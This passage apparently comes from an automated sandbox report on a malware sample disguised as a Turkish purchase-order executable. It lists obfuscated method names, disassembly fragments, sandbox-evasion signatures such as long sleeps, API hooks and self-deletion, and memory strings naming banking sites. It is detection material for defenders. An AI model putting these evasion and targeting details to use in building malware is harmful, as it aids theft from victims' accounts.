            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00401A31 push es; retf 5_2_00401A37
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0041435D push CF08DBE8h; retf 5_2_00414385
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004233D3 push edi; iretd 5_2_004233DE
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D462 push ebx; iretd 5_2_0040D45A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00408465 pushfd ; iretd 5_2_00408472
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00414C7A push edx; iretd 5_2_00414C91
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D407 push ebx; iretd 5_2_0040D45A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00414C83 push edx; iretd 5_2_00414C91
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00414DD6 push ebx; iretd 5_2_00414DD7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_004185F8 push ebp; ret 5_2_004185F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00403590 push eax; ret 5_2_00403592
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_00416653 push edx; retf 5_2_004167A1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040D686 push ebp; retf 5_2_0040D688
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0040174F push ds; iretd 5_2_00401765
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0170225F pushad ; ret 5_2_017027F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017027FA pushad ; ret 5_2_017027F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017309AD push ecx; mov dword ptr [esp], ecx 5_2_017309B6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0170283D push eax; iretd 5_2_01702858
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0318E25D push edi; iretd 12_2_0318E268
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_03178291 push ebx; iretd 12_2_031782E4
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_031732EF pushfd ; iretd 12_2_031732FC
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_031782EC push ebx; iretd 12_2_031782E4
            Source: C:\Program Files (x86)\fCItteFJYCpGRjbbipFVZXppqDEMltRMTRZhTmAkhCdoSZgFZhPaeeYRYCCJYhiNGjPK\zkhJmzWnNnFLoIoaAsyqpwQZ.exeCode function: 12_2_0318A184 push ds; iretd 12_2_0318A194
            Source: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeStatic PE information: section name: .text entropy: 7.978509985045748
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, wNIeg05p2J7LI0sxAR.csHigh entropy of concatenated method names: 'NImRDM0cjf', 'TpyRXtcAxC', 'U9UCyfsU2Y', 'cFsCrg05Ja', 'WkYRHdyqxA', 'VK1R7oyHoy', 'TnsRiBCRj8', 'MprRunGlCo', 'vABRGG4Awa', 'gteRf7AQBg'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, hlp3NEjD1wHnN17DLi.csHigh entropy of concatenated method names: 'wIfCBKOMC0', 'DbOCT3JGFl', 'M1ACYxOm3s', 'iEVCmZ3mDg', 'OjTCuoyvxr', 'wjRC9C74ho', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, Avoj1xuZSJJPO5cL1n.csHigh entropy of concatenated method names: 'mSgaJCtutB', 'E1ma7q9C06', 'tGDaubWDjp', 'mBmaG79fZ5', 'Cd7aTQkUjY', 'bCLaY33FCU', 'THkamxRFp0', 'hP0a9vnUAQ', 'gg9aweanRF', 'bjNatNwR5B'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, CrKSSdWwC4ohnA1aue.csHigh entropy of concatenated method names: 'FbcRLh9JgW', 'jAcRhTGmdL', 'ToString', 'NgLRv9Nkw7', 'lO9RxlUuY0', 'GBMRFs2DJG', 'KE6RoDYiNq', 'EWVRpU1TA9', 'q9NRAXobQ3', 'rCYR3ItP2u'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, P5EYD3VTbd1RAsAUnc.csHigh entropy of concatenated method names: 'lIQxuGqBEd', 'lNDxG4akiX', 'xn5xfXSDWn', 'mTDxW1A7F3', 'i0MxOJ0R0H', 'Ehvx5QMOxZ', 'zgWxMVXbHG', 'M5axDxXSAO', 'Pt2xjtUxmm', 'R6exXPw9uo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, qHo7EMPthDctL8gHN0.csHigh entropy of concatenated method names: 'EajAcq0svO', 'bM9AKy4rSt', 'tAvASO0B7o', 'QsKA0dtng0', 'DfMAkRxMDn', 'jDgA17kEOA', 'xg9An6Eecn', 'hkvAVKo0ix', 'NbcAQ1kv6D', 'MIGAsXO45h'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, C4bZLLrNrbZofIeJmqZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'M4mluCB7tx', 'pmClGW8veQ', 'JRFlfUXl8p', 'vgnlWvLPBr', 'Q9glO2DBFn', 'de5l55Dt4Y', 'eT8lM47SDF'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, hKuFhjryaSVDxkDxM28.csHigh entropy of concatenated method names: 'LBfEcUNRag', 'jMiEKlDBRT', 'swcES0hw9u', 'wysE0uIYat', 'vCQEk7rGdX', 'rBeE1LsXM1', 'osTEn4GX1U', 'IyxEVHWqBo', 'WehEQn8egO', 'LnBEsHihx6'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, oDcZLoiMDjhxP6TWfD.csHigh entropy of concatenated method names: 'yVw4Vna94c', 'PVF4QoR7Tu', 'hWn4BgyStB', 'oZX4TnfV5q', 'whp4mFUbNK', 'lR249NSKy6', 'ITs4teOODJ', 'VMg46r7Skx', 'dHW4JBj2m2', 'umb4Hao2Ha'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, SPjLDHDQd8ndbtcfNw.csHigh entropy of concatenated method names: 'NYOCvhndW7', 'hpBCxC4spn', 'XgICFHUOhg', 'z8LCoOkimi', 'rmZCprJP8U', 'MKECAwMWul', 'e3uC3xtEUn', 'ceyCgeqwR8', 'cvOCLKn0mF', 'h2KChdl6ZO'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, FxTBy2f31BZEcJBBZx.csHigh entropy of concatenated method names: 'ToString', 'aJdbH1vyeo', 't4gbTmS45i', 'mELbYoVfjs', 'fJkbmjXknP', 'FcBb9XxU9w', 'wK3bw5CDbI', 'DSKbt6qKVw', 'O9Hb6WAoEg', 'fwFbPODYZe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, Cv8vxsTJ4YVbIBS0cF.csHigh entropy of concatenated method names: 'G3kF0E303P3ObbByeTh', 'V2mI0K3VGSFTA5wFxkA', 'bd8Uor3FAOSvJmju4Ym', 'HrFpCtyo6e', 'e5BpEoJdR5', 'XEKplVYVQJ', 'b22NTc3TDBM9ao9Zv6a', 'bp9DpI3sfSQ1HZJbi68', 'KUANZk3EpWQm3p8UuQA'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, QLUuWKz8Wdj3Ib1tdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LPYE4aX3fJ', 'fv2EaxPxpW', 'WYfEbaQsqS', 'DExERX2WPl', 'FMHECfGgGa', 'hq4EEWjRnq', 'O1cEl0qjc9'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, lHBIC5x361wOap6SkM.csHigh entropy of concatenated method names: 'Dispose', 'X0arjahDUi', 'MAaeTds3j2', 'NlHqqhjSKI', 'OfPrXjLDHQ', 'v8nrzdbtcf', 'ProcessDialogKey', 'cwFeylp3NE', 'W1werHnN17', 'XLieeSVmAt'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, BDhqcm3UeZWT7A9K30.csHigh entropy of concatenated method names: 'E2cNUt9JZX', 'sAfNvMqBZt', 'nx3NxNDweS', 'zCjNF4lqqe', 'USaNoRW76C', 'kQGNpUV1MU', 'cxkNASXVHt', 'B77N3bxyMO', 'ocSNglJF1y', 'FtpNLFXHQy'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, URwXUFBkg0MlltB7UT.csHigh entropy of concatenated method names: 'm7MpUrwGO0', 'Am5pxgR61u', 'XSspogGfgO', 'mC3pAttV5y', 'YLJp3b1uJv', 'U7SoOhubaU', 'qeXo5xKrch', 'iP4oMlj2Id', 'WN9oDig9qa', 'GeGojVpHtC'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, o43hex2TD0vtHdwI8s.csHigh entropy of concatenated method names: 'iQirA5EYD3', 'Hbdr31RAsA', 'PbcrL8dpDU', 'VxwrhHfiFK', 'S89raFRORw', 'YUFrbkg0Ml', 'oeInT3XV12k7ZZaxmT', 'LkUtVogbuMdFmFJVme', 'xIpmPnatLyJ2YJD9tN', 'j2Trr4f4f3'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, g5Gsf8thO2d1YMtUaY.csHigh entropy of concatenated method names: 'Pq3AvKDdHd', 'XeSAFyjKIK', 'kt4ApI8rQv', 'AaqpXEhRyS', 'Wf9pz5YUlU', 'Kk3AyLqRg7', 'nkBArTcXuP', 'AyrAeXeZWP', 'JWCANNXhUe', 'y9NA2yQoKT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, jGA7F3es1uwcXBQf56.csHigh entropy of concatenated method names: 'kWaSJK1Xa', 'hQD0E3sWm', 'Qsu1e49La', 'jvvnac0en', 'aAJQoTDn1', 'D0ispGaF7', 'Ge6JxjBPkjPXdQbLQ5', 'Qm3dK0AC6KLxR81K78', 'yMLCZrvMN', 'Seqll5rYe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, yTB8liQbc8dpDUMxwH.csHigh entropy of concatenated method names: 'DhfF0JCW7Q', 'lxYF1T13Fb', 'tyBFVmSKUp', 'alnFQ5J0Q6', 'SDWFadhLKx', 'rDVFbbTZ6V', 'V8PFRLiamB', 'g5nFCclAi7', 'HY1FE2i56F', 'G24FlsXFtS'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.4a8b310.2.raw.unpack, zVmAtVXaZ7bPSxv3Fo.csHigh entropy of concatenated method names: 'R8kErHthN4', 'qqjENLInr4', 'xiIE2FQfW4', 'dd2Ev3rErQ', 'BifExlAUQX', 'z1OEofaDJj', 'oqoEpROpYx', 'wjdCMHEw67', 'I2ACDyERfu', 'K32Cj38ZmS'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, wNIeg05p2J7LI0sxAR.csHigh entropy of concatenated method names: 'NImRDM0cjf', 'TpyRXtcAxC', 'U9UCyfsU2Y', 'cFsCrg05Ja', 'WkYRHdyqxA', 'VK1R7oyHoy', 'TnsRiBCRj8', 'MprRunGlCo', 'vABRGG4Awa', 'gteRf7AQBg'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, hlp3NEjD1wHnN17DLi.csHigh entropy of concatenated method names: 'wIfCBKOMC0', 'DbOCT3JGFl', 'M1ACYxOm3s', 'iEVCmZ3mDg', 'OjTCuoyvxr', 'wjRC9C74ho', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, Avoj1xuZSJJPO5cL1n.csHigh entropy of concatenated method names: 'mSgaJCtutB', 'E1ma7q9C06', 'tGDaubWDjp', 'mBmaG79fZ5', 'Cd7aTQkUjY', 'bCLaY33FCU', 'THkamxRFp0', 'hP0a9vnUAQ', 'gg9aweanRF', 'bjNatNwR5B'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, CrKSSdWwC4ohnA1aue.csHigh entropy of concatenated method names: 'FbcRLh9JgW', 'jAcRhTGmdL', 'ToString', 'NgLRv9Nkw7', 'lO9RxlUuY0', 'GBMRFs2DJG', 'KE6RoDYiNq', 'EWVRpU1TA9', 'q9NRAXobQ3', 'rCYR3ItP2u'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, P5EYD3VTbd1RAsAUnc.csHigh entropy of concatenated method names: 'lIQxuGqBEd', 'lNDxG4akiX', 'xn5xfXSDWn', 'mTDxW1A7F3', 'i0MxOJ0R0H', 'Ehvx5QMOxZ', 'zgWxMVXbHG', 'M5axDxXSAO', 'Pt2xjtUxmm', 'R6exXPw9uo'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, qHo7EMPthDctL8gHN0.csHigh entropy of concatenated method names: 'EajAcq0svO', 'bM9AKy4rSt', 'tAvASO0B7o', 'QsKA0dtng0', 'DfMAkRxMDn', 'jDgA17kEOA', 'xg9An6Eecn', 'hkvAVKo0ix', 'NbcAQ1kv6D', 'MIGAsXO45h'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, C4bZLLrNrbZofIeJmqZ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'M4mluCB7tx', 'pmClGW8veQ', 'JRFlfUXl8p', 'vgnlWvLPBr', 'Q9glO2DBFn', 'de5l55Dt4Y', 'eT8lM47SDF'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, hKuFhjryaSVDxkDxM28.csHigh entropy of concatenated method names: 'LBfEcUNRag', 'jMiEKlDBRT', 'swcES0hw9u', 'wysE0uIYat', 'vCQEk7rGdX', 'rBeE1LsXM1', 'osTEn4GX1U', 'IyxEVHWqBo', 'WehEQn8egO', 'LnBEsHihx6'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, oDcZLoiMDjhxP6TWfD.csHigh entropy of concatenated method names: 'yVw4Vna94c', 'PVF4QoR7Tu', 'hWn4BgyStB', 'oZX4TnfV5q', 'whp4mFUbNK', 'lR249NSKy6', 'ITs4teOODJ', 'VMg46r7Skx', 'dHW4JBj2m2', 'umb4Hao2Ha'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, SPjLDHDQd8ndbtcfNw.csHigh entropy of concatenated method names: 'NYOCvhndW7', 'hpBCxC4spn', 'XgICFHUOhg', 'z8LCoOkimi', 'rmZCprJP8U', 'MKECAwMWul', 'e3uC3xtEUn', 'ceyCgeqwR8', 'cvOCLKn0mF', 'h2KChdl6ZO'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, FxTBy2f31BZEcJBBZx.csHigh entropy of concatenated method names: 'ToString', 'aJdbH1vyeo', 't4gbTmS45i', 'mELbYoVfjs', 'fJkbmjXknP', 'FcBb9XxU9w', 'wK3bw5CDbI', 'DSKbt6qKVw', 'O9Hb6WAoEg', 'fwFbPODYZe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, Cv8vxsTJ4YVbIBS0cF.csHigh entropy of concatenated method names: 'G3kF0E303P3ObbByeTh', 'V2mI0K3VGSFTA5wFxkA', 'bd8Uor3FAOSvJmju4Ym', 'HrFpCtyo6e', 'e5BpEoJdR5', 'XEKplVYVQJ', 'b22NTc3TDBM9ao9Zv6a', 'bp9DpI3sfSQ1HZJbi68', 'KUANZk3EpWQm3p8UuQA'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, QLUuWKz8Wdj3Ib1tdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LPYE4aX3fJ', 'fv2EaxPxpW', 'WYfEbaQsqS', 'DExERX2WPl', 'FMHECfGgGa', 'hq4EEWjRnq', 'O1cEl0qjc9'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, lHBIC5x361wOap6SkM.csHigh entropy of concatenated method names: 'Dispose', 'X0arjahDUi', 'MAaeTds3j2', 'NlHqqhjSKI', 'OfPrXjLDHQ', 'v8nrzdbtcf', 'ProcessDialogKey', 'cwFeylp3NE', 'W1werHnN17', 'XLieeSVmAt'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, BDhqcm3UeZWT7A9K30.csHigh entropy of concatenated method names: 'E2cNUt9JZX', 'sAfNvMqBZt', 'nx3NxNDweS', 'zCjNF4lqqe', 'USaNoRW76C', 'kQGNpUV1MU', 'cxkNASXVHt', 'B77N3bxyMO', 'ocSNglJF1y', 'FtpNLFXHQy'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, URwXUFBkg0MlltB7UT.csHigh entropy of concatenated method names: 'm7MpUrwGO0', 'Am5pxgR61u', 'XSspogGfgO', 'mC3pAttV5y', 'YLJp3b1uJv', 'U7SoOhubaU', 'qeXo5xKrch', 'iP4oMlj2Id', 'WN9oDig9qa', 'GeGojVpHtC'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, o43hex2TD0vtHdwI8s.csHigh entropy of concatenated method names: 'iQirA5EYD3', 'Hbdr31RAsA', 'PbcrL8dpDU', 'VxwrhHfiFK', 'S89raFRORw', 'YUFrbkg0Ml', 'oeInT3XV12k7ZZaxmT', 'LkUtVogbuMdFmFJVme', 'xIpmPnatLyJ2YJD9tN', 'j2Trr4f4f3'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, g5Gsf8thO2d1YMtUaY.csHigh entropy of concatenated method names: 'Pq3AvKDdHd', 'XeSAFyjKIK', 'kt4ApI8rQv', 'AaqpXEhRyS', 'Wf9pz5YUlU', 'Kk3AyLqRg7', 'nkBArTcXuP', 'AyrAeXeZWP', 'JWCANNXhUe', 'y9NA2yQoKT'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, jGA7F3es1uwcXBQf56.csHigh entropy of concatenated method names: 'kWaSJK1Xa', 'hQD0E3sWm', 'Qsu1e49La', 'jvvnac0en', 'aAJQoTDn1', 'D0ispGaF7', 'Ge6JxjBPkjPXdQbLQ5', 'Qm3dK0AC6KLxR81K78', 'yMLCZrvMN', 'Seqll5rYe'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, yTB8liQbc8dpDUMxwH.csHigh entropy of concatenated method names: 'DhfF0JCW7Q', 'lxYF1T13Fb', 'tyBFVmSKUp', 'alnFQ5J0Q6', 'SDWFadhLKx', 'rDVFbbTZ6V', 'V8PFRLiamB', 'g5nFCclAi7', 'HY1FE2i56F', 'G24FlsXFtS'
            Source: 0.2.03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe.d530000.6.raw.unpack, zVmAtVXaZ7bPSxv3Fo.csHigh entropy of concatenated method names: 'R8kErHthN4', 'qqjENLInr4', 'xiIE2FQfW4', 'dd2Ev3rErQ', 'BifExlAUQX', 'z1OEofaDJj', 'oqoEpROpYx', 'wjdCMHEw67', 'I2ACDyERfu', 'K32Cj38ZmS'
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeFile created: \03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exe

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\shutdown.exeFile deleted: c:\users\user\desktop\03.07.2024-sipari#u015f ug01072410 -onka ve tic a.s.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\shutdown.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara matchFile source: Process Memory Space: 03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe PID: 7524, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\shutdown.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 1050000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 2D90000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 2CA0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 7C40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 8C40000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 8DF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: 9DF0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: A150000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: B150000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: C150000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: D600000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: E600000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: F600000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Memory allocated: FCB0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177096E rdtsc 5_2_0177096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3778
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 856
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\shutdown.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exe TID: 7584 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848 Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7836 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\shutdown.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\shutdown.exeCode function: 13_2_0324C240 FindFirstFileW,FindNextFileW,FindClose,13_2_0324C240
            Source: 3y36225.13.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 3y36225.13.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: shutdown.exe, 0000000D.00000002.2561874080.000000000340D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln'Id
            Source: 3y36225.13.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 3y36225.13.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 3y36225.13.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: zkhJmzWnNnFLoIoaAsyqpwQZ.exe, 0000000E.00000002.2562812206.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: 3y36225.13.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 3y36225.13.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 3y36225.13.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
